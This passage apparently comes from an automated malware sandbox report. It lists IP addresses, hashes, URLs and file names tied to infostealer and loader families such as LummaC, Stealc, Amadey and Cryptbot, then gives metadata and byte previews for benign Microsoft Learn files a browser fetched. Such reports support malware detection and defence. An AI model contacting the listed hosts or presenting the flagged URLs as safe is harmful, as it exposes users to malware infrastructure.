                                                                                                                                                                              • 185.215.113.206
                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 185.215.113.16
                                                                                                                                                                              file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                              • 185.215.113.206
                                                                                                                                                                              file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                              • 185.215.113.206
                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                              • 185.215.113.206
                                                                                                                                                                              file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                              • 185.215.113.206
                                                                                                                                                                              file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                              • 185.215.113.206
                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                              • 185.215.113.206
                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              28a2c9bd18a11de089ef85a160da29e4https://www.google.is/url?q=rafqigacjrkrnnioqkowziyxaiusnluqeulymwebekupzxoc&rct=zolesnudazazmzgsjvwdvqzilxazcumsnbozxtjbwldgyqzgdzrrmmqlnmokqbxpnmciglrj&sa=t&url=amp/ne.ypejwf9.sa.com/floxc/itaal/sf_rand_string_mixed(24)/toto@yahoo.frGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 4.175.87.197
                                                                                                                                                                              • 20.109.210.53
                                                                                                                                                                              • 184.28.90.27
                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                              https://ollama.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 4.175.87.197
                                                                                                                                                                              • 20.109.210.53
                                                                                                                                                                              • 184.28.90.27
                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                              Secured Audlo_secpod.com_1524702658.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 4.175.87.197
                                                                                                                                                                              • 20.109.210.53
                                                                                                                                                                              • 184.28.90.27
                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                              https://fxwf9-53194.portmap.io:53194/?x=sb232111Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 4.175.87.197
                                                                                                                                                                              • 20.109.210.53
                                                                                                                                                                              • 184.28.90.27
                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                              • 4.175.87.197
                                                                                                                                                                              • 20.109.210.53
                                                                                                                                                                              • 184.28.90.27
                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 4.175.87.197
                                                                                                                                                                              • 20.109.210.53
                                                                                                                                                                              • 184.28.90.27
                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                              file.exeGet hashmaliciousCryptbotBrowse
                                                                                                                                                                              • 4.175.87.197
                                                                                                                                                                              • 20.109.210.53
                                                                                                                                                                              • 184.28.90.27
                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                              https://www.virustotal.com/gui/domain/ghabovethec.info/detection#:~:text=API-,ghabovethec.info,-RegistrarGet hashmaliciousAveMariaBrowse
                                                                                                                                                                              • 4.175.87.197
                                                                                                                                                                              • 20.109.210.53
                                                                                                                                                                              • 184.28.90.27
                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                              • 4.175.87.197
                                                                                                                                                                              • 20.109.210.53
                                                                                                                                                                              • 184.28.90.27
                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                              file.exeGet hashmaliciousCryptbotBrowse
                                                                                                                                                                              • 4.175.87.197
                                                                                                                                                                              • 20.109.210.53
                                                                                                                                                                              • 184.28.90.27
                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                              3b5074b1b5d032e5620f69f9f700ff0ehttps://ollama.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 40.113.110.67
                                                                                                                                                                              z1Tender_procurement_product_order__21_11_2024_.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                              • 40.113.110.67
                                                                                                                                                                              ArchivoNuevo.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 40.113.110.67
                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 40.113.110.67
                                                                                                                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 40.113.110.67
                                                                                                                                                                              https://tally.so/widgets/embed.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 40.113.110.67
                                                                                                                                                                              Lreticupdwy.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 40.113.110.67
                                                                                                                                                                              Lreticupdwy.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 40.113.110.67
                                                                                                                                                                              https://www.cbirc.gov.cn/cn/view/pages/index/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 40.113.110.67
                                                                                                                                                                              BOA-everbridge.com-$29,890.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 40.113.110.67
                                                                                                                                                                              a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                              No context
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 19696, version 1.0
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):19696
                                                                                                                                                                              Entropy (8bit):7.9898910353479335
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:37wfQhsuDSP36Elj0oScS8w3F1ZTt5JwtRGsh1SJR3YL0BeojRs8E:37Cms69owH3FPutReFYL+eods8E
                                                                                                                                                                              MD5:4D0BFEA9EBDA0657CEE433600ED087B6
                                                                                                                                                                              SHA1:F13C690B170D5BA6BE45DEDC576776CA79718D98
                                                                                                                                                                              SHA-256:67E7D8E61B9984289B6F3F476BBEB6CEB955BEC823243263CF1EE57D7DB7AE9A
                                                                                                                                                                              SHA-512:9136ADEC32F1D29A72A486B4604309AA8F9611663FA1E8D49079B67260B2B09CEFDC3852CF5C08CA9F5D8EA718A16DBD8D8120AC3164B0D1519D8EF8A19E4EA5
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                                              URL:https://learn.microsoft.com/static/assets/0.4.028726178/styles/docons.a1ef6ef.34a85e0c.woff2
                                                                                                                                                                              Preview:wOF2......L........`..L..........................T.V..@........6.$........ ..y.......d^..Awp(......<.1..fE.......I......z-.*."YTZ.p.eMd.#..7.qY..Z.!..V...!......r...Z.;b........J....X..;.^...>UQ%U..CkT.....zKG.!\8%..>.b.4o4.t*..........3..C..?u....E.S$.:.....mfZ......... .Q...].y.*.@....m.tC.C6. ......37..,V...F.a...A.. .PQ".A...B...p...q..!QA.N..m.......(..........gv..L...5M&._..+@.U..k.....CU..@...._.9q{....B..C.dB.F.a......J_Jo..M..oR....m......r...U0...y!.@-.h7...z....e.....J+...-{.s..1...^...zM[~....Fy.';.V..*.=.%......"..H..w.9L..$.{d.j&..... K...P`.$.g....;.0..........T.v....j.0Ht..<. ...<\......Ol.|_U.+rmW..JK..".e<C ...q.?...B..l..Ni.....H....D..n@.......=c.f3.7........t...Z...}{....S;..KU.Ho.`....._?m....y...32l^.(..r..........Z...{U....W(......|.q..P.`,.YQ....-,c...g*F..=....."M.......sq....-....w(.e.K........^2e.3&.|,..4.TO..D].........W..W%j.._...nS.X.gE..3;2..:...Y..4j.-....c0A...U...p......d.M..6.L..b....O:[['wN.|49.......]
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (33148), with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):33148
                                                                                                                                                                              Entropy (8bit):4.917595394577667
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUuro:5hOEO8chkMet7pCjBfcHkWOzUuro
                                                                                                                                                                              MD5:C4DE3932AA578FA03847604F09660315
                                                                                                                                                                              SHA1:5EFBA9D7F437AF4786560559FBF162C4475AAD4F
                                                                                                                                                                              SHA-256:7683C2566CBF3C67F1A645891CC7B4DE7D143FE40E0271E106AB55E90EF9C5A8
                                                                                                                                                                              SHA-512:3DCA7F8C7C2997D473B2B80916F3E976167BA06300E915CB301DB2A024A826B9E8D3A60B6111835A5FB9A3273B4080D89351F664F9CC410C18B7F76327C326AE
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                                              URL:https://learn.microsoft.com/en-us/dotnet/framework/toc.json
                                                                                                                                                                              Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):35005
                                                                                                                                                                              Entropy (8bit):7.980061050467981
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                              MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                              SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                              SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                              SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                                              Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):13842
                                                                                                                                                                              Entropy (8bit):7.802399161550213
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                              MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                              SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                              SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                              SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):4897
                                                                                                                                                                              Entropy (8bit):4.8007377074457604
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                              MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                              SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                              SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                              SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (639), with CRLF, LF line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):47062
                                                                                                                                                                              Entropy (8bit):5.016115705165622
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:haAE16LIElO6L6x2bTI1ln4a1T0MCFnFMBVeZrdLg:hTAGLlO6eAbTIr4audZqBkZRLg
                                                                                                                                                                              MD5:B7BA0F1B4D3EE09BD4C1DD5EE8FA2633
                                                                                                                                                                              SHA1:A5725E0BD2E4DE3EB07E9C468306615CD0CE6955
                                                                                                                                                                              SHA-256:411BCF8F95DAF3C6D0BEBDFA4DDEFD0F947D2083C1A27BDD0E5D19BB6F299838
                                                                                                                                                                              SHA-512:59F535B445302E8A8398F02F7729D16236C629EB0967833257F8BA391A4E93B3A23A5FA3D64127EC117B8D93A6D7A9B86EBCB4B6E6F96CFF3B4DB3EE3C5F4844
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              URL:https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                              Preview:<!DOCTYPE html><html..class="hasSidebar hasPageActions hasBreadcrumb conceptual has-default-focus theme-light"..lang="en-us"..dir="ltr"..data-authenticated="false"..data-auth-status-determined="false"..data-target="docs"..x-ms-format-detection="none">..<head>..<meta charset="utf-8" />..<meta name="viewport" content="width=device-width, initial-scale=1.0" />..<meta property="og:title" content="Fix .NET Framework 'This application could not be started' - .NET Framework" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started" /><meta property="og:description" content="Learn what to do if you see a 'This application could not be started' dialog box when running a .NET Framework application." /><meta property="og:image" content="https://learn.microsoft.com/dotnet/media/dotnet-logo.png" />...<meta property="og:image:alt" content="Fix .NET Framework 'This application could not be st
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):3130
                                                                                                                                                                              Entropy (8bit):4.790069981348324
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                              MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                              SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                              SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                              SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              URL:https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.json
                                                                                                                                                                              Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):18367
                                                                                                                                                                              Entropy (8bit):7.7772261735974215
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                              MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                              SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                              SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                              SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):13339
                                                                                                                                                                              Entropy (8bit):7.683569563478597
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                              MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                              SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                              SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                              SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):18367
                                                                                                                                                                              Entropy (8bit):7.7772261735974215
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                              MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                              SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                              SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                              SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png
                                                                                                                                                                              Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1154
                                                                                                                                                                              Entropy (8bit):4.59126408969148
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                              MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                              SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                              SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                              SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                              Malicious:false
